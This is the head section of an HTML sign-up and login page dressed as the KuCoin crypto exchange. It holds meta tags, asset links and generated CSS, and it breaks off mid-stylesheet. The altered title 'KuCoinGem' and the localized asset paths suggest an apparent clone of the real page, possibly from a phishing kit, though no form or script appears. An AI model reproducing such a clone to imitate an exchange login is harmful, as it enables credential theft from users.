<!DOCTYPE html>
<html translate="no" lang="en" dir="ltr">

  <head>
  <!--[SSG] created at Mon, 04 Sep 2023 06:50:58 GMT--> 
  <meta charset="utf-8">  
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="renderer" content="webkit">
  <link rel="preconnect" href="assets.staticimg.com/index.html">
  <link rel="icon" href="./img/favicon.png">
  <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no">
  <meta name="theme-color" content="#000000">
  <meta name="importmap-type" content="systemjs-importmap">
  <meta httpequiv="Pragma" content="no-cache">
  <meta httpequiv="Cache-Control" content="no-cache, max-age=0, must-revalidate">
  <meta httpequiv="Expires" content="0">
  <meta name="twitter:site" content="@kucoincom">
  <meta name="google" content="notranslate">
  <meta name="description" content="Sign up with KuCoin, and get your first crypto today!">
  <meta name="keywords" content="Sign Up,Register for an Account,Open an Account">
  <meta name="yandex-verification" content="f31b7ed8b0fb11e8">
  <meta name="facebook-domain-verification" content="we62fkvs4zu5hinmxeei2jbd9u30da">
  <link rel="preload" href="assets.staticimg.com/natasha/npm/%40kux/font/KFOmCnqEu92Fr1Mu4mxKKTU1Kg.woff2" as="font" type="font/woff2" crossorigin="">
  <link rel="preload" href="assets.staticimg.com/natasha/npm/%40kux/font/KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.woff2" as="font" type="font/woff2" crossorigin="">
  <link rel="preload" href="assets.staticimg.com/natasha/npm/%40kux/font/KFOlCnqEu92Fr1MmEU9fABc4AMP6lbBP.woff2" as="font" type="font/woff2" crossorigin="">
  <link rel="preload" href="assets.staticimg.com/natasha/npm/%40kux/font/KFOlCnqEu92Fr1MmWUlfBBc4AMP6lQ.woff2" as="font" type="font/woff2" crossorigin="">
  <link rel="stylesheet" href="assets.staticimg.com/natasha/npm/%40kufox/mui%402.5.14/umd/kufox-mui.umd.min.css">
  <noscript>
  <link rel="stylesheet" href="assets.staticimg.com/natasha/npm/%40kux/font/css.css"></noscript>
  <title>KuCoinGem: Sign Login</title>
  <link href="assets.staticimg.com/natasha/npm/anomaly/style.css" rel="prefetch" as="style" crossorigin="">
  <link href="assets.staticimg.com/natasha/npm/fontsGoogleapis/googleapis.css" rel="prefetch" as="style" crossorigin="">
  <link href="assets.staticimg.com/ucenter-web/1.1.1/css/app.1af092.css" rel="stylesheet">
  <link rel="stylesheet" type="text/css" href="assets.staticimg.com/ucenter-web/1.1.1/css/1717.fd374f.css">
  <link rel="stylesheet" href="assets.staticimg.com/cms-static/c_cms.common_en_US2671.css?t=1693810" data-meta="cms_common">
  <link rel="stylesheet" href="assets.staticimg.com/cms-static/c_com.index.body.bottom_en_US2671.css?t=1693810" data-meta="com_index_body_bottom">
  <link rel="stylesheet" href="assets.staticimg.com/cms-static/c_com.seo.land.tradingbot_en_US2671.css?t=1693810" data-meta="com_seo_land_tradingbot">
  <link rel="stylesheet" href="assets.staticimg.com/cms-static/c_com.seo.land.c2c_en_US2671.css?t=1693810" data-meta="com_seo_land_c2c">
  <link rel="stylesheet" href="assets.staticimg.com/cms-static/c_com.community_en_US2671.css?t=1693810" data-meta="com_community">
  <meta name="twitter:card" content="summary_large_image" data-rh="true">
  <meta name="twitter:image" content="https://assets.staticimg.com/cms/media/7feiEEHmJE61RECXMyp8rTcA5Qcsl0zSv6rz9NVjg.png" data-rh="true">
  <meta name="twitter:image:src" content="https://assets.staticimg.com/cms/media/7feiEEHmJE61RECXMyp8rTcA5Qcsl0zSv6rz9NVjg.png" data-rh="true">
  <meta property="og:image" content="https://assets.staticimg.com/cms/media/7feiEEHmJE61RECXMyp8rTcA5Qcsl0zSv6rz9NVjg.png" data-rh="true">
  <meta property="og:image:secure_url" content="https://assets.staticimg.com/cms/media/7feiEEHmJE61RECXMyp8rTcA5Qcsl0zSv6rz9NVjg.png" data-rh="true">
  <meta property="og:image:width" content="1200" data-rh="true">
  <meta property="og:image:height" content="630" data-rh="true">
  <meta property="og:type" content="website" data-rh="true">
  <meta property="og:locale:alternate" content="de_DE" data-rh="true">
  <meta property="og:locale" content="en_US" data-rh="true">
  <meta property="og:locale:alternate" content="es_ES" data-rh="true">
  <meta property="og:locale:alternate" content="fr_FR" data-rh="true">
  <meta property="og:locale:alternate" content="ko_KR" data-rh="true">
  <meta property="og:locale:alternate" content="nl_NL" data-rh="true">
  <meta property="og:locale:alternate" content="pt_PT" data-rh="true">
  <meta property="og:locale:alternate" content="ru_RU" data-rh="true">
  <meta property="og:locale:alternate" content="tr_TR" data-rh="true">
  <meta property="og:locale:alternate" content="vi_VN" data-rh="true">
  <meta property="og:locale:alternate" content="zh_HK" data-rh="true">
  <meta property="og:locale:alternate" content="it_IT" data-rh="true">
  <meta property="og:locale:alternate" content="id_ID" data-rh="true">
  <meta property="og:locale:alternate" content="ms_MY" data-rh="true">
  <meta property="og:locale:alternate" content="hi_IN" data-rh="true">
  <meta property="og:locale:alternate" content="th_TH" data-rh="true">
  <meta property="og:locale:alternate" content="ja_JP" data-rh="true">
  <meta property="og:locale:alternate" content="bn_BD" data-rh="true">
  <meta property="og:locale:alternate" content="pl_PL" data-rh="true">
  <meta property="og:locale:alternate" content="fil_PH" data-rh="true">
  <meta property="og:locale:alternate" content="ar_AE" data-rh="true">
  <meta property="og:locale:alternate" content="ur_PK" data-rh="true">
  <meta property="og:title" content="KuCoin: Sign Up | Register">
  <meta name="twitter:title" content="KuCoin: Sign Up | Register">
  <meta property="og:image:alt" content="KuCoin: Sign Up | Register">
  <meta property="twitter:image:alt" content="KuCoin: Sign Up | Register">
  <meta property="og:description" content="Sign up with KuCoin, and get your first crypto today!">
  <meta name="twitter:description" content="Sign up with KuCoin, and get your first crypto today!">
  <style id="ssg-jss-node" ssg-jss-node="1" type="text/css">
    .css-76ygvu .gbiz-headeroom { border-bottom: 1px solid rgba(29, 29, 29, 0.08); }  .css-1dn57jc { position: fixed; top: 0px; height: 100vh; width: 100%; overflow-y: auto; background: rgb(255, 255, 255); display: flex; flex-direction: column; }  .css-1dn57jc::-webkit-scrollbar { width: 4px; background: transparent; }  .css-1dn57jc::-webkit-scrollbar-track { background: transparent; }  .css-1dn57jc::-webkit-scrollbar-thumb { background: rgb(204, 204, 204); border-radius: 2px; }  .css-h96opg { width: 100%; flex: 1 1 0%; border-top: 1px solid rgba(29, 29, 29, 0.08); }  .css-1erus7g { box-sizing: border-box; min-height: 0px; min-width: 0px; width: 100%; height: 100%; }  .css-13d3z8n { width: 570px; position: absolute; top: 90px; left: 50px; }  [dir="rtl"] .css-13d3z8n { top: 80px; right: 50px; width: 600px; padding: 24px; background: linear-gradient(270deg, rgb(234, 249, 248) 0%, rgba(235, 255, 254, 0) 100%); border-radius: 12px; }  @media (max-width: 1439px) {
    .css-13d3z8n { top: 70px; left: 40px; width: 400px; }
    [dir="rtl"] .css-13d3z8n { top: 66px; right: 24px; width: 450px; }
    }  .css-1hwe9d5 { width: 100%; font-size: 18px; font-weight: 500; line-height: 130%; word-break: break-word; color: rgb(29, 29, 29); }  .css-1c7cr12 { width: 40px; height: 4px; margin: 24px 0px; border-radius: 20px; background: rgb(1, 188, 141); }  .css-1n36i2x { font-size: 36px; font-weight: 700; line-height: 150%; color: rgb(29, 29, 29); word-break: break-word; }  .css-1n36i2x .highlight { color: rgb(255, 215, 55); font-weight: 800; font-size: 40px; line-height: 130%; -webkit-text-stroke: 1px rgb(29, 29, 29); }  @media (max-width: 1439px) {
      .css-1n36i2x { font-size: 28px; }
      .css-1n36i2x .highlight { font-size: 32px; }
    }  body fieldset { min-width: initial; padding: initial; margin: initial; border: initial; margin-inline: 2px; padding-block: 0.35em 0.625em; padding-inline: 0.75em; }  body legend { width: initial; padding: initial; padding-inline: 2px; }  .css-atxi5g { position: relative; z-index: 100; width: 100%; }  .css-atxi5g .logo { vertical-align: middle; }  .css-1dftvkr { height: 0px; }  .css-n4rmn7 { position: fixed; top: 0px; left: 0px; right: 0px; z-index: 1000; background-color: rgb(255, 255, 255); transition: background-color 0.5s ease 0s; }  .css-1eazsyg { padding: 0px 32px; transition: all 0.3s ease 0s; }  @media (max-width: 1439px) {
      .css-1eazsyg { padding: 0px 24px; }
    }  @media (max-width: 767px) {
      .css-1eazsyg { padding: 0px 16px; }
    }  .css-6ljh47 { display: flex; position: relative; flex: 1 1 auto; margin: 0px auto; transition: all 0.3s ease 0s; width: 100%; height: 80px; -webkit-box-pack: justify; justify-content: space-between; }  @media (max-width: 1439px) {
      .css-6ljh47 { height: 64px; }
    }  .css-6qnjre { display: flex; -webkit-box-align: center; align-items: center; height: 100%; }  .css-1evik99 { display: flex; -webkit-box-align: center; align-items: center; }  .css-1evik99:hover { opacity: 0.8; }  .css-qoy9sy { width: 121px; height: 28px; transition: all 0.3s ease 0s; }  @media (max-width: 1439px) {
      .css-qoy9sy { width: 103.71px; height: 24px; }
    }  .css-1sg2lsz { display: flex; -webkit-box-align: center; align-items: center; }  .css-1qt7m5u { display: flex; -webkit-box-align: center; align-items: center; flex-direction: row; }  .css-1qt7m5u .navUserItem { color: rgb(29, 29, 29); cursor: pointer; padding: 0px; font-size: 14px; display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; width: auto; white-space: nowrap; text-decoration: none !important; background-clip: border-box !important; }  [dir="rtl"] .css-1qt7m5u .navUserItem { padding: 0px 0px 0px 12px; }  .css-1qt7m5u .navUserItem[data-menu="i18n"], .css-1qt7m5u .navUserItem[data-menu="currency"], .css-1qt7m5u .navUserItem[data-menu="download"], .css-1qt7m5u .navUserItem[data-menu="theme"] { display: flex; }  .css-1qt7m5u .navUserItem[data-menu="order"], .css-1qt7m5u .navUserItem[data-menu="asset"], .css-1qt7m5u .navUserItem[data-menu="person"] { display: flex; }  .css-1qt7m5u .navUserItem[data-menu="download"], .css-1qt7m5u .navUserItem[data-menu="i18n"], .css-1qt7m5u .navUserItem[data-menu="currency"], .css-1qt7m5u .navUserItem[data-menu="notice"], .css-1qt7m5u .navUserItem[data-menu="person"], .css-1qt7m5u .navUserItem[data-menu="order"] { padding: 0px; }  .css-1qt7m5u .navUserItem[data-menu="notice"] { margin-right: 12px; margin-left: 0px; }  .css-1qt7m5u .navUserItem[data-menu="person"], .css-1qt7m5u .navUserItem[data-menu="order"], .css-1qt7m5u .navUserItem[data-menu="notice"] { margin-left: 12px; }  [dir="rtl"] .css-1qt7m5u .navUserItem[data-menu="download"] { margin-right: 12px; }  [dir="rtl"] .css-1qt7m5u .navUserItem[data-menu="notice"] { margin: 0px; }  @media (max-width: 767px) {
      .css-1qt7m5u .navUserItem[data-menu="notice"] svg { width: 16px; height: 16px; }
    }  [dir="rtl"] .css-1qt7m5u .navUserItem[data-menu="person"] { margin-left: 0px; }  [dir="rtl"] .css-1qt7m5u .navUserItem[data-menu="theme"] { padding: 0px 12px 0px 0px; }  .css-1qt7m5u .navUserItem.signinLink { width: auto; margin-right: unset; }  @media screen and (max-width: 414px) {
      .css-1qt7m5u .navUserItem.signinLink { display: none; }
    }  .css-1qt7m5u .navUserItem.signinLink:hover { opacity: 0.6; }  .css-1qt7m5u .navUserItem.signinLink:active { opacity: 1; }  .css-1qt7m5u .navUserItem .signinBtn { width: unset; padding: 9px 24px; font-weight: 500; font-size: 14px; line-height: 130%; text-align: center; color: rgb(29, 29, 29); margin: 0px; transition: all 0.3s ease 0s; border: unset; border-radius: 24px; }  @media (max-width: 767px) {
      .css-1qt7m5u .navUserItem .signinBtn { font-size: 12px; }
    }  [dir="rtl"] .css-1qt7m5u .navUserItem .signinBtn { margin: 0px; }  .css-1qt7m5u .navUserItem.signUpLink { width: auto; }  .css-1qt7m5u .navUserItem.signUpLink:hover { opacity: 0.6; }  .css-1qt7m5u .navUserItem.signUpLink:active { opacity: 1; }  .css-1qt7m5u .navUserItem.signUpLink:active > img { display: block; }  .css-1qt7m5u .navUserItem .signUpBtn { width: unset; padding: 9px 28px; border-radius: 90px; font-weight: 700; font-size: 14px; line-height: 130%; text-align: center; color: rgb(255, 255, 255); background: rgb(29, 29, 29); position: relative; transition: all 0.3s ease 0s; }  @media (max-width: 767px) {
      .css-1qt7m5u .navUserItem .signUpBtn { padding: 8px 16px; font-size: 12px; }
    }  .css-9zi109 { display: flex; -webkit-box-align: center; align-items: center; margin-right: 0px; flex-direction: row; width: auto; padding: 0px; -webkit-box-pack: unset; justify-content: unset; }  .css-v71wna { width: 1px; height: 16px; margin: 0px 12px; }  [dir="rtl"] .css-v71wna { margin: 0px 12px 0px 0px; }  .css-15bj1sf { border: none; flex-shrink: 0; background: rgba(29, 29, 29, 0.08); display: block; width: 1px; height: 16px; margin: 0px 12px; }  [dir="rtl"] .css-15bj1sf { margin: 0px 12px 0px 0px; }  .css-1b9zzns { width: 40px; height: 40px; background: rgba(29, 29, 29, 0.04); border-radius: 50%; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; display: none; }  [dir="rtl"] .css-1b9zzns { margin-right: 12px; }  @media (max-width: 767px) {
      .css-1b9zzns { width: 32px; height: 32px; line-height: 30px; font-size: 14px; }
    }  .css-1b9zzns:hover svg { fill: rgb(1, 188, 141); }  .css-1n99kaq { max-width: 400px; width: 100%; height: 100vh; overflow: auto; background-color: rgb(255, 255, 255); padding: 0px !important; }  .css-1n99kaq .KuxDrawer-content::-webkit-scrollbar { width: 3px; height: 3px; }  .css-1n99kaq .KuxDrawer-content::-webkit-scrollbar-thumb { border-radius: 2px; background: rgba(29, 29, 29, 0.08); }  .css-1n99kaq .showDownBox { padding: 0px 24px; }  .css-1n99kaq .userBox { margin: 0px; }  .css-lmssxu { max-width: 400px; width: 100%; }  .css-lmssxu .KuxDrawer-content { }  .css-lmssxu .KuxDrawer-content::-webkit-scrollbar { display: none; }  .css-1iv9pmj { height: 81px; }  .css-1lm9f0d { display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; width: 40px; height: 40px; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-color: rgba(29, 29, 29, 0.04); border-radius: 20px; margin-left: 12px; background-clip: padding-box !important; }  [dir="rtl"] .css-1lm9f0d { margin-left: 0px; margin-right: 12px; }  .css-1lm9f0d svg { color: rgb(29, 29, 29); }  .css-1lm9f0d span { color: rgb(29, 29, 29); font-weight: 600; font-size: 14px; }  .css-1lm9f0d:hover svg, .css-1lm9f0d:hover span { color: rgb(1, 188, 141); }  .css-14yu18w .KuxModalHeader-root .KuxModalHeader-close { top: 24px !important; }  .css-14yu18w .KuxDialog-content { padding: 0px; border-radius: 0px 0px 20px 20px; }  .css-162y68p { height: 80px; }  .css-wcpi88 .__AnimateOverlay__ { animation-duration: 0.23s; animation-name: animation-v15rbp; animation-fill-mode: forwards; }  @-webkit-keyframes animation-v15rbp { 
      0% { opacity: 1; transform: translateY(0px); }
      100% { opacity: 0; transform: translateY(8px); }
    }  @keyframes animation-v15rbp { 
      0% { opacity: 1; transform: translateY(0px); }
      100% { opacity: 0; transform: translateY(8px); }
    }  .css-1a3v9iz { display: inline-flex; }  .css-1a3v9iz .__AnimateOverlay__ { animation-duration: 0.23s; animation-name: animation-v15rbp; animation-fill-mode: forwards; }  .css-5xkyj6 { display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; width: 40px; height: 40px; background: rgba(29, 29, 29, 0.04); border-radius: 50%; }  .css-5xkyj6 svg { margin: 0px 6px; }  .css-5xkyj6 img { width: 16px; }  .css-5xkyj6:hover svg { fill: rgb(1, 188, 141); }  .css-1dz931i { width: 100%; height: 100%; display: flex; flex-direction: column; background: rgb(255, 255, 255); }  .css-1dz931i .banner { flex: 0 0 45%; }  .css-gfyiy3 { display: flex; flex-flow: row wrap; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; }  .css-gfyiy3::before, .css-gfyiy3::after { display: flex; }  .css-139vhbh { position: relative; min-height: 1px; display: block; flex: 0 0 45.8333%; max-width: 45.8333%; }  .css-c0ajov { box-sizing: border-box; min-height: 0px; min-width: 0px; display: flex; height: 100%; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; position: relative; }  .css-qrlrtm { box-sizing: border-box; min-height: 0px; min-width: 0px; width: 100%; position: absolute; bottom: 0px; }  .css-fm3kvj { position: absolute; inset: 0px; z-index: 0; display: flex; }  .css-14d5rtx { flex: 1 1 55%; height: 100%; object-fit: cover; overflow: hidden; }  .css-ts3x3g { position: relative; min-height: 1px; display: block; }  .css-mpa8nz { box-sizing: border-box; min-height: 0px; min-width: 0px; display: flex; height: 100%; width: 100%; align-items: flex-start; -webkit-box-pack: start; justify-content: flex-start; position: relative; }  .css-1rsyla4 { position: relative; margin-top: 100px; margin-bottom: 100px; flex: 1 1 0%; width: 100%; }  @media (max-width:NaNpx) {
      .css-1rsyla4 { margin-top: 40px; margin-bottom: 40px; }
    }  @media (max-width: 767px) {
      .css-1rsyla4 { padding: 0px 16px; margin-top: 40px; margin-bottom: 40px; }
    }  .css-5kgvnz { box-sizing: border-box; min-height: 0px; min-width: 0px; position: relative; margin-top: 100px; margin-bottom: 100px; flex: 1 1 0%; width: 100%; }  @media (max-width:NaNpx) {
      .css-5kgvnz { margin-top: 40px; margin-bottom: 40px; }
    }  @media (max-width: 767px) {
      .css-5kgvnz { padding: 0px 16px; margin-top: 40px; margin-bottom: 40px; }
    }  .css-uuchwj { width: 100%; max-width: 486px; margin: 0px auto 0px 100px; padding: unset; }  @media (max-width: 1439px) {
      .css-uuchwj { margin: 0px auto; }
    }  @media (max-width: 1199px) {
      .css-uuchwj { margin: 0px auto; padding: unset; }
    }  @media (max-width: 767px) {
      .css-uuchwj { width: 100%; margin: 0px auto; max-width: unset; padding: unset; }
    }  .css-b38fps { box-sizing: border-box; min-height: 0px; min-width: 0px; width: 100%; max-width: 486px; margin: 0px auto 0px 100px; padding: unset; }  @media (max-width: 1439px) {
      .css-b38fps { margin: 0px auto; }
    }  @media (max-width: 1199px) {
      .css-b38fps { margin: 0px auto; padding: unset; }
    }  @media (max-width: 767px) {
      .css-b38fps { width: 100%; margin: 0px auto; max-width: unset; padding: unset; }
    }  .css-1b1nvj1 { font-size: 40px; line-height: 130%; margin-bottom: 33px; font-weight: 700; color: rgb(29, 29, 29); word-break: break-word; }  @media screen and (max-width: 768px) {
      .css-1b1nvj1 { font-size: 24px; margin-bottom: 25px; }
    }  .css-1yvtdo { margin-bottom: 24px; }  .css-5pto6a { position: relative; overflow: hidden; display: flex; -webkit-box-align: center; align-items: center; flex-direction: row; height: 48px; border-bottom: none; }  .css-1v8kgrz { position: relative; display: inline-block; flex: 1 1 auto; white-space: nowrap; height: 100%; overflow: hidden; width: 100%; }  .css-v0g351 { display: flex; flex-direction: row; transition: all 0.3s ease 0s; padding-top: 11px; }  .css-12u19n3 { overflow: hidden; flex-shrink: 0; text-align: center; white-space: normal; cursor: pointer; font-family: Roboto, "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei"; display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; outline: 0px; box-sizing: border-box; user-select: none; vertical-align: middle; appearance: none; text-decoration: none; -webkit-font-smoothing: antialiased; padding: 0px; font-weight: 500; -webkit-text-stroke: 0.4px rgb(29, 29, 29); line-height: 130%; color: rgb(29, 29, 29); transition: all 300ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; font-size: 16px; margin-left: 24px; }  .css-12u19n3:first-of-type { margin-left: 0px; }  [dir="rtl"] .css-12u19n3 { margin-left: 0px; margin-right: 24px; }  .css-12u19n3:hover { color: rgb(29, 29, 29); }  .css-1freloz { position: absolute; display: flex; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; bottom: 0px; width: 100%; height: 4px; }  .css-1sknxmt { background: rgb(29, 29, 29); display: flex; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; border-radius: 4px; transition: all 0.3s ease 0s; height: 4px; width: 24px; }  .css-1jrps8g { overflow: hidden; flex-shrink: 0; text-align: center; white-space: normal; cursor: pointer; font-family: Roboto, "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei"; display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; outline: 0px; box-sizing: border-box; user-select: none; vertical-align: middle; appearance: none; text-decoration: none; -webkit-font-smoothing: antialiased; padding: 0px; font-weight: 500; -webkit-text-stroke: unset; line-height: 130%; color: rgba(29, 29, 29, 0.4); transition: all 300ms cubic-bezier(0.4, 0, 0.2, 1) 0ms; font-size: 16px; margin-left: 24px; }  .css-1jrps8g:first-of-type { margin-left: 0px; }  [dir="rtl"] .css-1jrps8g { margin-left: 0px; margin-right: 24px; }  .css-1jrps8g:hover { color: rgba(29, 29, 29, 0.6); }  .css-1b12qyh { box-sizing: border-box; min-height: 0px; min-width: 0px; width: 100%; position: absolute; bottom: 0px; right: 0px; }  .css-fcf6q .mtSpace { margin-top: 8px; }  @media (max-width: 767px) {
      .css-fcf6q .mtSpace { margin-top: 0px; }
    }  .css-9mv970 { box-sizing: border-box; margin: 0px; padding: 0px; list-style: none; }  .css-jvj7uf { flex-direction: column; }  .css-1uqn2oy { display: flex; flex-flow: column wrap; -webkit-box-pack: start; justify-content: flex-start; align-items: flex-start; }  .css-1uqn2oy::before, .css-1uqn2oy::after { display: flex; }  .css-1ofqig9 { display: flex; flex-direction: column; width: 100%; }  .css-1dbp2j { position: relative; min-height: 1px; display: flex; flex-direction: column; width: 100%; }  .css-kooiip { position: relative; z-index: 1; }  .css-1yw1v9j { position: relative; font-family: Roboto, "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei"; background: transparent; outline: none; width: 100%; height: fit-content; box-sizing: border-box; border-radius: 8px; display: flex; flex-direction: row; -webkit-box-align: center; align-items: center; opacity: 1; cursor: text; padding: 0px 16px; }  .css-1yn4dg3 { position: absolute; left: 0px; top: 0px; transform-origin: left top; padding: 0px 2px; white-space: nowrap; transition: color 200ms cubic-bezier(0, 0, 0.2, 1) 0ms, transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms, max-width 200ms cubic-bezier(0, 0, 0.2, 1) 0ms; font-size: 16px; line-height: 24px; transform: translate(14px, 16px) scale(1); color: rgb(29, 29, 29); pointer-events: none; }  [dir="rtl"] .css-1yn4dg3 { left: unset; right: 0px; font-size: 16px; line-height: 24px; transform: translate(-16px, 16px) scale(1); }  .css-1nddmz0 { border: none; outline: none; padding: 0px; width: 100%; flex: 1 1 0%; margin: 0px; box-sizing: border-box; background: transparent; -webkit-tap-highlight-color: transparent; font-family: Roboto, "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei"; color: rgb(29, 29, 29); cursor: text; font-weight: 500; font-size: 16px; height: 56px; line-height: 26px; }  .css-1nddmz0:-webkit-autofill { transition-delay: 99999s; }  .css-1nddmz0:-webkit-autofill:hover { transition-delay: 99999s; }  .css-1nddmz0:-webkit-autofill:focus { transition-delay: 99999s; }  .css-1nddmz0:-webkit-autofill:active { transition-delay: 99999s; }  .css-1nddmz0:focus { outline: none; }  .css-1nddmz0::-webkit-input-placeholder { color: rgba(29, 29, 29, 0.4); font-family: Roboto, "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei"; }  .css-1i4kc6k { position: absolute; inset: -5px -2px 0px; pointer-events: none; border-radius: 8px; border-style: solid; border-width: 1px; border-color: rgba(29, 29, 29, 0.12); overflow: hidden; }  .css-17b03pk { visibility: hidden; height: 12px; line-height: 24px; max-width: 0.01px; padding: 0px; font-size: 12px; }  .css-gvtyj4 { min-height: 24px; display: flex; }  .css-7roxj2 { margin-left: 12px; }  .css-c8a67t { visibility: hidden; }  .css-js6o5x { box-sizing: border-box; min-height: 0px; min-width: 0px; display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; }  .css-gu4t9 { margin-left: 4px; cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; }  .css-gu4t9:hover { opacity: 0.7; }  .css-1pwkgr3 { font-size: 14px; }  .css-txmj0v { color: rgba(29, 29, 29, 0.6); display: flex; -webkit-box-align: center; align-items: center; }  .css-txmj0v:hover { cursor: pointer; }  .css-txmj0v span { font-weight: 400; font-size: 14px; line-height: 130%; color: rgba(29, 29, 29, 0.6); margin-right: 8px; }  .css-oqopf2 { z-index: 1070; }  .css-38lglc { display: none; }  .css-jmf9id { display: flex; margin-top: 16px; }  .css-hkv7uv { box-sizing: border-box; margin: 0px; padding: 0px; font-family: Roboto, "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei"; color: rgb(29, 29, 29); list-style: none; position: relative; display: inline-block; line-height: unset; cursor: pointer; opacity: 1; }  .css-hkv7uv:not(:last-of-type) { margin-right: 0px; }  .css-hkv7uv::after { display: inline-block; width: 0px; overflow: hidden; content: "a0"; }  .css-157ll7t { box-sizing: border-box; margin: 0px; list-style: none; position: relative; display: inline-block; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; outline: none; cursor: pointer; white-space: nowrap; line-height: 1; vertical-align: middle; top: -0.09em; }  .css-1q67xq6 { position: absolute; inset: 0px; width: 100%; height: 100%; z-index: 1; cursor: inherit; opacity: 0; margin: 0px; }  .css-qsv8ak { display: flex; box-sizing: border-box; position: relative; left: 0px; top: 0px; background: rgb(29, 29, 29); border: 2px solid rgb(29, 29, 29); border-radius: 100%; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; width: 18.3px; height: 18.3px; }  .css-qsv8ak svg { width: 12px; height: 12px; }  .css-76wc5 { margin-left: 6px; font-size: 14px; line-height: 22px; }  [dir="rtl"] .css-76wc5 { margin-left: unset; margin-right: 6px; }  .css-1ahqney { color: rgba(29, 29, 29, 0.6); font-size: 14px; font-weight: 400; }  .css-1ahqney a { cursor: pointer; color: rgb(29, 29, 29); font-weight: 700; text-decoration: underline; }  .css-1awe74r { display: inline-flex; flex-shrink: 0; -webkit-box-pack: center; justify-content: center; -webkit-box-align: center; align-items: center; box-sizing: border-box; border-radius: 24px; outline: none; border: none; cursor: pointer; width: 100%; opacity: 1; pointer-events: auto; font-family: Roboto, "PingFang SC", -apple-system, BlinkMacSystemFont, "Microsoft YaHei"; font-weight: 700; height: 48px; font-size: 16px; padding: 0px 32px; color: rgb(255, 255, 255); background: rgb(29, 29, 29); }  .css-1awe74r:hover { background: rgb(38, 38, 38); }  .css-1awe74r:active { background: rgb(56, 56, 56); }  .css-81nkya { margin-top: 24px; }  @media (max-width: 767px) {
      .css-81nkya { margin-top: 16px; }
    }  .css-pllb1j { position: absolute; left: 0px; top: 0px; transform-origin: left top; padding: 0px 2px; white-space: nowrap; transition: color 200ms cubic-bezier(0, 0, 0.2, 1) 0ms, transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms, max-width 200ms cubic-bezier(0, 0, 0.2, 1) 0ms; font-size: 16px; line-height: 24px; transform: translate(14px, -9px) scale(0.75); color: rgb(1, 188, 141); pointer-events: none; }  [dir="rtl"] .css-pllb1j { left: unset; right: 0px; font-size: 16px; line-height: 24px; transform: translate(9px, -9px) scale(0.75); }  .css-1yd51zm { position: absolute; inset: -5px -2px 0px; pointer-events: none; border-radius: 8px; border-style: solid; border-width: 1px; border-color: rgb(1, 188, 141); overflow: hidden; }  .css-cufmhu { visibility: hidden; height: 12px; line-height: 24px; max-width: 100%; padding: 2px; font-size: 12px; }  .css-rvip7g { height: 100%; }  @media (max-width: 48rem) {
      .css-rvip7g { position: relative; overflow: hidden; border-radius: 16px 16px 0px 0px; }
    }  .css-1y4jh0f { font-weight: 400; font-size: 14px; line-height: 130%; }  .css-1y4jh0f .fastText { color: rgba(0, 13, 29, 0.6); margin-bottom: 0px; }  .css-1y4jh0f .fastText a { color: rgb(0, 13, 29); font-weight: 700; text-decoration: underline; cursor: pointer; }
  </style>
  <style id="ssg-jss-node" ssg-jss-node="1" type="text/css">.css-76ygvu .gbiz-headeroom { border-bottom: 1px solid rgba(29, 29, 29, 0.08); }  .css-1dn57jc { position: fixed; top: 0px; height: 100vh; width: 100%; overflow-y: auto; background: rgb(255, 255, 255); display: flex; flex-direction: column; }  .css-1dn57jc::-webkit-scrollbar { width: 4px; background: transparent; }  .css-1dn57jc::-webkit-scrollbar-track { background: transparent; }  .css-1dn57jc::-webkit-scrollbar-thumb { background: rgb(204, 204, 204); border-radius: 2px; }  .css-h96opg { width: 100%; flex: 1 1 0%; border-top: 1px solid rgba(29, 29, 29, 0.08); }  .css-1uos6m1 { box-sizing: border-box; min-height: 0px; min-width: 0px; width: 100%; }  .css-kqdmr5 { width: 570px; position: absolute; top: 90px; left: 50px; }  [dir="rtl"] .css-kqdmr5 { right: 50px; }  @media (max-width: 1439px) {
    .css-kqdmr5 { top: 70px; left: 40px; width: 400px; }
    [dir="rtl"] .css-kqdmr5 { right: 40px; }
  }  .css-1hwe9d5 { width: 100%; font-size: 18px; font-weight: 500; line-height: 130%; word-break: break-word; color: rgb(29, 29, 29); }  .css-1c7cr12 { width: 40px; height: 4px; margin: 24px 0px; border-radius: 20px; background: rgb(1, 188, 141); }  .css-1truut5 { font-size: 32px; font-weight: 700; line-height: 150%; color: rgb(29, 29, 29); word-break: break-word; }  .css-1truut5 .highlight { -webkit-text-stroke: 1px red; }  @media (max-width: 1439px) {
    .css-1truut5 { font-size: 28px; }
